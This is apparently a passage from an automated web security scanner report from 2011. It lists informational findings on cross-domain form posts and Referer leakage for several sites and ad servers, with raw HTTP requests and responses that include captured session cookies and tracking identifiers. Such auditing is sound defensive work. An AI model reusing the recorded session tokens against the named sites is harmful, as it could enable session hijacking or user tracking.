hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 457 others like this.</span><span class="connect_widget_not_connected_text">457 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

19. Cross-domain POST  previous  next
There are 5 instances of this issue:


19.1. http://afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.6.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:16 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:16 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</div>
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<strong>
...[SNIP]...

19.2. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:42:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=GEADHBADIKBEHFGIANJELJKN; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:43:58 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</div>
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<strong>
...[SNIP]...

19.3. http://www.cleanallspyware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cleanallspyware.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.cleanallspyware.com
Proxy-Connection: keep-alive
Referer: http://cleanallspyware.com/Spam
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 15712

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<title>How to Remove Spyware</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta name="
...[SNIP]...
<img src="images/signupnow.jpg" alt="Sign up now - it's 100% Free!" id="signupheader" />
               <form method="post" action="http://www.aweber.com/scripts/addlead.pl">
               <input type="hidden" name="meta_web_form_id" value="794349">
...[SNIP]...

19.4. http://www.hipaarx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipaarx.net
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.bridgefront.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.hipaarx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Distance Learning |
...[SNIP]...
<br /><form method="post" action="http://www.bridgefront.com/AC/box.php" accept-charset='utf-8'>

<table width="142" border="1" align="center" cellpadding="3" cellspacing="0" bordercolor="#B0B7CD">
...[SNIP]...

19.5. http://www.onestoppciscan.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onestoppciscan.com
Path:   /contact.html

Issue detail

The page contains a form which POSTs data to the domain lakefloyd.com. The form contains the following fields:

Request

GET /contact.html HTTP/1.1
Host: www.onestoppciscan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:53:30 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 13:42:49 GMT
ETag: "df8475-413a-49efe4dae6840"
Accept-Ranges: bytes
Content-Length: 16698
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
   <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.backbonesecurity.com/interior.cfm?itemCategory=39808&siteid=418&pr
...[SNIP]...
<!-- Plaintext email form for now -->
<form action="http://lakefloyd.com/backbone/Protected/mailform.cfm"
   method="post" name="ContactForm">

<input type ="hidden" NAME="sendto" VALUE="jeff@aagg.com">
...[SNIP]...

20. Cross-domain Referer leakage  previous  next
There are 60 instances of this issue:


20.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3896
Date: Tue, 26 Apr 2011 14:21:07 GMT

_289667_amg_acamp_id=166308;
_289667_amg_pcamp_id=69114;
_289667_amg_location_id=55367;
_289667_amg_creative_id=289667;
_289667_amg_loaded=true;
var _amg_289667_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732015/direct/01/rnd=1351645398?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUwaPB564QcxR6ewY9H0HZ0fikYa5nZW8sdXNhLHQsMTMwMzgyNzY2ODI1OSxjLDI4OTY2NyxwYyw2OTExNCxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY3LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1BRclhvM0E5REVBOUN0ZWpjRDBNUUJMYWNpN0ZsUUJBcEhBOUN0Y2pFMENrY0QwSzF5TVRRRlVjT2FLYWhEdGRTc1lkYTZiMnppWEoxTFpOQUFBQUFFUXdBQUMxQUFBQWxnSUFBQUlBQUFERXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFIZ0FXQUpoREUwQUFnMEJBZ1VDQUFRQUFBQUFseDhMS2dBQUFBQS4vY25kPSF1QTU2WkFpUW1RTVF4TWtLR0FBZzBjY0JLRTB4TXpNekVkY2pFMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQlk0UmhnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWwvY2xpY2tlbmM9aHR0cDovL2dvb2dsZWFkcy5nLmRvdWJsZWNsaWNrLm5ldC9hY2xrP3NhPWwmYWk9Qk9ualR5ZFMyVGZHS0VjaTFzUWZSNnFXSkFkZnEtTk1CcDUtVTdCanJ3dTNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAxTWpVek9EQTVORE13T1RRd05ERXdvQUhEOHYzc0E3SUJFSGQzZHk1emNHRnRiR0YzY3k1amIyMjZBUW94TWpCNE5qQXdYMkZ6eUFFSjJnRXBhSFIwY0RvdkwzZDNkeTV6Y0dGdGJHRjNjeTVqYjIwdmMzQmhiUzFpYkc5amEyVnlMbWgwYld5WUFzb2J3QUlFeUFLRjBzOEtxQU1CNkFPNkF1Z0RpZ1AxQXdBQUFNU0FCcnFraGY3SzlxV25UdyZudW09MSZzaWc9QUdpV3F0eWV5NkltTzFlT3B1LU1VT29HMnRnbW9aOVZQZyZjbGllbnQ9Y2EtcHViLTUyNTM4MDk0MzA5NDA0MTAmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
d0FJRXlBS0YwczhLcUFNQjZBTzZBdWdEaWdQMUF3QUFBTVNBQnJxa2hmN0s5cVduVHcmbnVtPTEmc2lnPUFHaVdxdHlleTZJbU8xZU9wdS1NVU9vRzJ0Z21vWjlWUGcmY2xpZW50PWNhLXB1Yi01MjUzODA5NDMwOTQwNDEwJmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732015/direct/01/rnd=1351645398" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69114&c5=166308&c6=&cv=1.3&cj=1&rn=1715867565" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 835
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 11:34:20 GMT
Expires: Tue, 26 Apr 2011 11:34:20 GMT
Discarded: true

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1u
...[SNIP]...
mdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

20.3. http://afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.10.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:05:01 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:06:00 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...
</div>
                   <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf"></script> <noscript> <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...
<td width="100%"><iframe name="check_frame" width="318" height="199" src="http://www.spruzme.com/files/apps/geolocator/frame.asp" style="display:none;">
Your browser does not support inline frames or is currently configured not to display inline frames.
</iframe>
...[SNIP]...

20.4. http://afreshbunch.com/forums/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14353
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:26 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
</title>

<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...

20.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
